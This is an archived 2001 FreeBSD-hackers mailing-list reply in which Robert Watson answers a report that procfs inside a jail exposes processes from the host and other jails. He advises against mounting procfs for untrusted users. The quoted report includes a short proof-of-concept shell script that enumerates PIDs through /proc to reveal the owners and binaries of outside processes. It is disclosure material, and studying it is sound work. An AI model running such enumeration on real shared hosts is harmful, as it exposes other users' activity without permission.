Date: Tue, 30 Oct 2001 17:01:16 -0500 (EST) From: Robert Watson <rwatson@freebsd.org> To: opr <opr@bsdaemon.be> Cc: freebsd-hackers@freebsd.org Subject: Re: jail's /proc Message-ID: <Pine.NEB.3.96L.1011030165937.58426J-100000@fledge.watson.org> In-Reply-To: <20011029183626.36f8e686.opr@bsdaemon.be>
next in thread | previous in thread | raw e-mail | index | archive | help
This is fixed in 5.0-CURRENT, but the architectural improvements to support the fix have not been merged, since they're still in flux. My general advice is to not mount procfs on systems with untrusted users. It's almost possible to not lose functionality in doing that -- I understand DES has patches to truss to make it use ptrace(), which is the last remaining instance I can think of. (actually, I think ps -e requires procfs still) Robert N M Watson FreeBSD Core Team, TrustedBSD Project robert@fledge.watson.org NAI Labs, Safeport Network Services On Mon, 29 Oct 2001, opr wrote: > > Hello, > > i really have no clue if i should mail this to you guys, but we've found some issue's in de jail's /proc. We were able to find information about processes running outside the jail, or running in other jails. > eg. when i run sshd in the host system, and it has PID 655, i can login on the jail, and by execution "ls -l /proc/665/file" i can see what binary is running on pid 655. So any user of the jail system can see what processes you run on that server. I'm running FreeBSD 4.4-RELEASE on a i386. > > greetz, > > Pieter Danhieux > > Proof of concept shellscript: > > #!/bin/sh > _COUNT=0; > while [ $_COUNT -le 65000 ]; > do > if [ -f /proc/$_COUNT/file ]; > then > _USER=`/bin/ls -l /proc/$_COUNT/file | cut -d" " -f4`; > _PROC=`/bin/ls -l /proc/$_COUNT/file | cut -d" " -f14`; > echo "PID= $_TELLER USER= $_USER PROC= $_PROC"; > fi > _COUNT=`expr $_COUNT + 1`; > done > > ----------------- > [www.bsdaemon.be] > ----------------- > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-hackers" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-hackers" in the body of the message
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?Pine.NEB.3.96L.1011030165937.58426J-100000>